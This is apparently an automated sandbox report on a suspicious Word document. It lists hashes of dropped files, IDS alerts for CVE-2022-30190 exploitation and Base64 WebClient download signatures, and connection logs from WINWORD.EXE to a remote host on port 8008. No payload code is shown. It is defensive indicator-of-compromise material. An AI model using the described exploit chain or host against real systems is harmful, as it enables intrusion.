SHA-256: | 56EF8D395A20E46295410DD854C67EE2AE49AFBDFF5F2D2EB27CA9A16481AA3C |
SHA-512: | 1594340344098975785F846B957888FB93E1FFC0F3A8EABC95834645C8D758F80AEB33BA4630C4F307A64F98ACAF8176C9BE9207C8744375C4560FFB2151C20B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.025545224349082966 |
Encrypted: | false |
SSDEEP: | 6:I3DPcrRvxggLR9QI+vAZ+pRXv//4tfnRujlw//+GtluJ/eRuj:I3DPypQI+HHvYg3J/ |
MD5: | 8B61E4E8242D0961EA9025B656A013E6 |
SHA1: | 0A9C2887993588A0BA822A3F2159F8615CD6482B |
SHA-256: | 3D97D4A53F94F3D859C0488F5B3DB1C7177DC575485332BD693B3D6F7D53D98E |
SHA-512: | 3EE33B89CB9A6F36DADADADE7DA78826ADAAC65AF69A021D8F9C48E3E9CCAF16125EB6141D75B8277F907A5861D64B95B0745FCE2DF676160F9FDC8FB47C6292 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1019 |
Entropy (8bit): | 4.5762421575069645 |
Encrypted: | false |
SSDEEP: | 12:81l80gXg/XAlCPCHaXBKBnB/xQpX+WAclGaiEazjuicvb8X9M804TazNDtZ3Yil2:8Ak/XTRKJIKdthNeqM8aDv3qdwY7h |
MD5: | 32CF2F9FC38195E95F72206961AE587C |
SHA1: | B9A93790175F263CA9264FE176C7A3939CE1E7C3 |
SHA-256: | D0AE07AF5C7F3745B60A89DE69F01D6039DCB11BA2357D20B4D17688D21DEB7B |
SHA-512: | A38940EEE57924015DA87622A835B6BDFB60BE4C71CFA17E54634A52C5AAD58FC02711539DAFEF8DFC6591593F19487AC120F965F77AAFF9D2A97A2C9FC9AF00 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 72 |
Entropy (8bit): | 4.824535814767059 |
Encrypted: | false |
SSDEEP: | 3:bDuMJlntd+pruYVomxW0hNxd+pruYVov:bCstMj7xMjy |
MD5: | 0B27580E2EF503551637D1B2B325B07C |
SHA1: | B861428A3D29FD19167867B18E7C5A6B1C052F9B |
SHA-256: | 85D83675D7ADE632A4EE881D9F2C48C3B5AC1A4698800DB416BBACA7346FB2EB |
SHA-512: | D8AF0CA7BE5345689B8ED4D26D64079E98EB75507FC41735464A85E449B70E8432B21F2ED0224A0B92F9B3616BFAF4C05AF7B0AA14ED23A810FA7EBF9F11E104 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.4797606462020303 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl |
MD5: | 1674A1C7C99CD9FAADA789F5E2AEB335 |
SHA1: | 26D9E81D5ED584A899A94D5EA8945A5AE3403F85 |
SHA-256: | BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6 |
SHA-512: | B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.4797606462020303 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl |
MD5: | 1674A1C7C99CD9FAADA789F5E2AEB335 |
SHA1: | 26D9E81D5ED584A899A94D5EA8945A5AE3403F85 |
SHA-256: | BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6 |
SHA-512: | B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.994153126444351 |
TrID: |
|
File name: | ZDhoKQk8G6.docx |
File size: | 449949 |
MD5: | b64108b4dbb4cc0ceeca091289d3c3e6 |
SHA1: | ad1eb7107e76f8d75cdb2c3a8cc39179dd490ef0 |
SHA256: | 52b48c4b2f4a63fc6611dea7e9146a440d41e306143788ea20c56c3ab292cf00 |
SHA512: | e3446e893cedc19a6b3dfb931d830f8467139f418fc851c47f638974dfe665cac8bea6decb5f15e087a9eb1a5c5bb59c63e4606f8f55b5ed1171ec4aed22d905 |
SSDEEP: | 12288:LMLNbEnsH8SUY8ceFl3b0tZ80HxVcsg/DKkxOIB:gRbEnsH8AeFlr0tFRVcsMKkJB |
TLSH: | 10A423E102FAA020F6B1095377D3230769414A7EB8B5438DCE2B765F54E37E896B24CD |
File Content Preview: | PK...........T....]...R.......[Content_Types].xml...j.0.E.....6.J.(.....e.h...4vD.BR^..Q..........{....p..*[.......>..p+..K.=}..H."3.)k.$..d<...N7.B.j.J2..=S...4..u`.RY.Y.W_S.....>....[...<&.2..B..*fok\nH..I......H..i..TxPaO..S...u.4b.+.1......t...G.R.x.N |
Icon Hash: | e4e6a2a2a4b4b4a4 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
117.48.146.246192.168.2.228008491782023942 06/15/22-07:10:36.033223 | TCP | 2023942 | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M2 | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
117.48.146.246192.168.2.228008491782036726 06/15/22-07:10:36.033223 | TCP | 2036726 | ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
117.48.146.246192.168.2.228008491782023941 06/15/22-07:10:36.033223 | TCP | 2023941 | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M1 | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
117.48.146.246192.168.2.228008491812023941 06/15/22-07:10:38.181098 | TCP | 2023941 | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M1 | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
117.48.146.246192.168.2.228008491812023942 06/15/22-07:10:38.181098 | TCP | 2023942 | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M2 | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
117.48.146.246192.168.2.228008491812036726 06/15/22-07:10:38.181098 | TCP | 2036726 | ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 15, 2022 07:10:20.092658043 CEST | 49173 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:20.358961105 CEST | 8008 | 49173 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:20.359108925 CEST | 49173 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:20.359492064 CEST | 49173 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:20.625736952 CEST | 8008 | 49173 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:20.626101971 CEST | 8008 | 49173 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:20.626133919 CEST | 8008 | 49173 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:20.626219034 CEST | 49173 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:20.626275063 CEST | 49173 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:20.626656055 CEST | 49173 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:20.892719030 CEST | 8008 | 49173 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:26.894349098 CEST | 49174 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:27.158770084 CEST | 8008 | 49174 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:27.158993959 CEST | 49174 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:27.159310102 CEST | 49174 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:27.423584938 CEST | 8008 | 49174 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:27.424031019 CEST | 8008 | 49174 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:27.424055099 CEST | 8008 | 49174 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:27.424156904 CEST | 49174 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:27.425761938 CEST | 49174 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:27.690138102 CEST | 8008 | 49174 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:31.470498085 CEST | 49175 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:31.725644112 CEST | 8008 | 49175 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:31.725795984 CEST | 49175 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:31.726026058 CEST | 49175 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:31.981231928 CEST | 8008 | 49175 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:31.981645107 CEST | 8008 | 49175 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:31.981693029 CEST | 8008 | 49175 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:31.981761932 CEST | 49175 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:31.982180119 CEST | 49175 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:32.237199068 CEST | 8008 | 49175 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:34.445723057 CEST | 49176 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:34.666729927 CEST | 8008 | 49176 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:34.666924953 CEST | 49176 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:34.670793056 CEST | 49176 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:34.891483068 CEST | 8008 | 49176 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:34.891915083 CEST | 8008 | 49176 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:34.891959906 CEST | 8008 | 49176 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:34.892024994 CEST | 49176 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:34.892211914 CEST | 49176 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:34.909142017 CEST | 49177 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:35.112771988 CEST | 8008 | 49176 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:35.182569981 CEST | 8008 | 49177 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:35.182718039 CEST | 49177 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:35.182955027 CEST | 49177 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:35.456417084 CEST | 8008 | 49177 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:35.456864119 CEST | 8008 | 49177 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:35.456901073 CEST | 8008 | 49177 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:35.456954002 CEST | 49177 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:35.457007885 CEST | 49177 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:35.519777060 CEST | 49178 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:35.730236053 CEST | 8008 | 49177 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:35.775444984 CEST | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:35.775731087 CEST | 49178 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:35.776213884 CEST | 49178 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:36.032572985 CEST | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:36.033222914 CEST | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:36.033334970 CEST | 49178 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:36.033478975 CEST | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:36.033510923 CEST | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:36.033538103 CEST | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:36.033565998 CEST | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:36.033570051 CEST | 49178 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:36.033584118 CEST | 49178 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:36.033588886 CEST | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:36.033596992 CEST | 49178 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:36.033617020 CEST | 49178 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:36.033636093 CEST | 49178 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:36.038124084 CEST | 49178 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:36.295587063 CEST | 8008 | 49178 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:36.539437056 CEST | 49179 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:36.804182053 CEST | 8008 | 49179 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:36.804420948 CEST | 49179 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:36.806541920 CEST | 49179 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:37.071590900 CEST | 8008 | 49179 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:37.072026968 CEST | 8008 | 49179 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:37.072043896 CEST | 8008 | 49179 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:37.072360039 CEST | 49179 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:37.072402000 CEST | 49179 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:37.135569096 CEST | 49180 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:37.336937904 CEST | 8008 | 49179 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:37.390664101 CEST | 8008 | 49180 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:37.390815973 CEST | 49180 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:37.390980005 CEST | 49180 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:37.645345926 CEST | 8008 | 49180 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:37.646136999 CEST | 8008 | 49180 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:37.646164894 CEST | 8008 | 49180 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:37.646297932 CEST | 49180 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:37.646500111 CEST | 49180 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:37.663650990 CEST | 49181 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:37.900646925 CEST | 8008 | 49180 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:37.921833992 CEST | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:37.921921968 CEST | 49181 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:37.922209024 CEST | 49181 | 8008 | 192.168.2.22 | 117.48.146.246 |
Jun 15, 2022 07:10:38.180035114 CEST | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:38.181097984 CEST | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:38.181127071 CEST | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:38.181153059 CEST | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:38.181178093 CEST | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
Jun 15, 2022 07:10:38.181200027 CEST | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49173 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:20.359492064 CEST | 1 | OUT | |
Jun 15, 2022 07:10:20.626133919 CEST | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49174 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:27.159310102 CEST | 3 | OUT | |
Jun 15, 2022 07:10:27.424031019 CEST | 3 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49175 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:31.726026058 CEST | 3 | OUT | |
Jun 15, 2022 07:10:31.981645107 CEST | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 117.48.146.246 | 8008 | 192.168.2.22 | 49176 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:34.891915083 CEST | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 117.48.146.246 | 8008 | 192.168.2.22 | 49177 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:35.456864119 CEST | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.22 | 49178 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:35.776213884 CEST | 6 | OUT | |
Jun 15, 2022 07:10:36.033222914 CEST | 6 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
6 | 192.168.2.22 | 49179 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:36.806541920 CEST | 13 | OUT | |
Jun 15, 2022 07:10:37.072026968 CEST | 14 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
7 | 192.168.2.22 | 49180 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:37.390980005 CEST | 14 | OUT | |
Jun 15, 2022 07:10:37.646136999 CEST | 14 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
8 | 192.168.2.22 | 49181 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:37.922209024 CEST | 15 | OUT | |
Jun 15, 2022 07:10:38.181097984 CEST | 15 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
9 | 192.168.2.22 | 49182 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:38.896841049 CEST | 22 | OUT | |
Jun 15, 2022 07:10:39.150418043 CEST | 22 | IN |
Target ID: | 0 |
Start time: | 07:11:14 |
Start date: | 15/06/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f280000 |
File size: | 1423704 bytes |
MD5 hash: | 9EE74859D22DAE61F1750B3A1BACB6F5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |